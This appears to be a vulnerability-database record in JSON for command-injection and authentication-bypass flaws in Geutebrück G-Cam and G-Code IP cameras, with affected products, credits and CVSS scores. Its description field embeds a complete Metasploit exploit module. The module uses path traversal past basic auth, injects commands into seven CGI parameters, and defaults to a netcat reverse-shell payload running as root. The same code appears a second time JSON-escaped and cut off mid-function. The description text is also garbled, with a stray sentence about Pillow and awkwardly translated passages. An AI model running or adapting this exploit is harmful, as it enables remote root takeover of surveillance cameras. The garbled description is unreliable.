"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
}
],
"trust": 0.6
}
}
VAR-202109-0597
Vulnerability from variot - Updated: 2025-01-30 21:21Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0597",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33544",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33544",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33544",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33544",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33544",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2093",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML 